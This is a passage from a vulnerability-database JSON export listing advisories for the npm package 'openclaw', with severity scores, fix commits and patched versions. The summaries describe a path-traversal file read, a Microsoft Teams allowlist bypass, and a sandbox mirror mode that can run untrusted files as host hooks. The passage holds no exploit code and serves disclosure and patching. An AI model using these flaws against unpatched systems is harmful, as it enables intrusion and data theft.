VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"}],"aliases":["CVE-2026-41398","GHSA-4p4f-fc8q-84m3"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-v9cd-65tf-p3f8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89738?format=json","vulnerability_id":"VCID-vktg-77tu-vycv","summary":"OpenClaw: Path traversal via inbound channel attachment path in ACP dispatch allows arbitrary file read\n## Summary\nPath traversal via inbound channel attachment path in ACP dispatch allows arbitrary file read\n\n## Current Maintainer Triage\n- Normalized severity: medium\n- Assessment: v2026.3.28 ACP dispatch still reads attachment paths outside the guarded attachment-cache or root checks, and the root-enforcement fix is not yet shipped.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `566fb73d9da2d73c0be0d9b8e5b762e4dcd8e81d` — 2026-03-30T14:04:02+01:00\n\nOpenClaw thanks @north-echo for reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/566fb73d9da2d73c0be0d9b8e5b762e4dcd8e81d","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/566fb73d9da2d73c0be0d9b8e5b762e4dcd8e81d"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-58q2-7r52-jq62","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-58q2-7r52-jq62"},{"reference_url":"https://github.com/advisories/GHSA-58q2-7r52-jq62","reference_id":"GHSA-58q2-7r52-jq62","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-58q2-7r52-jq62"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["GHSA-58q2-7r52-jq62"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vktg-77tu-vycv"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91432?format=json","vulnerability_id":"VCID-vm8g-hrvu-quhm","summary":"OpenClaw: MS Teams Feedback Invocation Bypasses Sender Allowlists and Records Unauthorized Session Feedback\n## Summary\n\nMS Teams Feedback Invoke Bypasses Sender Allowlists and Records Unauthorized Session Feedback\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nMicrosoft Teams feedback invokes previously bypassed sender authorization and could record feedback or trigger reflection for unauthorized senders. Commit `c5415a474bb085404c20f8b312e436997977b1ea` applies the same DM and group authorization checks to feedback invokes.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `c5415a474bb085404c20f8b312e436997977b1ea`.\n\n## Fix Commit(s)\n\n- `c5415a474bb085404c20f8b312e436997977b1ea`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35654","reference_id":"","reference_type":"","scores":[{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12423","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12387","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12424","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35654"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/c5415a474bb085404c20f8b312e436997977b1ea","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:43:38Z/"}],"url":"https://github.com/openclaw/openclaw/commit/c5415a474bb085404c20f8b312e436997977b1ea"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rf6h-5gpw-qrgq","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:43:38Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rf6h-5gpw-qrgq"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35654","reference_id":"CVE-2026-35654","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35654"},{"reference_url":"https://github.com/advisories/GHSA-rf6h-5gpw-qrgq","reference_id":"GHSA-rf6h-5gpw-qrgq","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rf6h-5gpw-qrgq"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-microsoft-teams-feedback-invoke","reference_id":"openclaw-authorization-bypass-in-microsoft-teams-feedback-invoke","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-13T17:43:38Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-authorization-bypass-in-microsoft-teams-feedback-invoke"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-35654","GHSA-rf6h-5gpw-qrgq"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vm8g-hrvu-quhm"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/88996?format=json","vulnerability_id":"VCID-vqrj-z6tx-rff2","summary":"OpenClaw: OpenShell `mirror` mode can convert untrusted sandbox files into explicitly enabled workspace hooks and execute them on the host during gateway startup\n## Summary\nOpenShell `mirror` mode can convert untrusted sandbox files into explicitly enabled workspace hooks and execute them on the host during gateway startup\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Real on shipped <=2026.3.22 OpenShell mirror sync, but exploit needs mirror mode plus hooks enabled plus explicit hook opt-in plus restart, so high is overstated even though the direct fix shipped in v2026.3.28.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.24`\n- Patched versions: `>= 2026.3.28`\n- First stable tag containing the fix: `v2026.3.28`\n\n## Fix Commit(s)\n- `c02ee8a3a4cb390b23afdf21317aa8b2096854d1` — 2026-03-25T19:59:07Z\n\n## Release Process Note\n- The fix is already present in released version `2026.3.28`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @tdjackey for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41355","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02672","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02725","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.0272","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41355"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/c02ee8a3a4cb390b23afdf21317aa8b2096854d1","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-24T14:22:04Z/"}],"url":"https://github.com/openclaw/openclaw/commit/c02ee8a3a4cb390b23afdf21317aa8b2096854d1"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-42mx-vp8m-j7qh","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-24T14:22:04Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-42mx-vp8m-j7qh"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41355","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3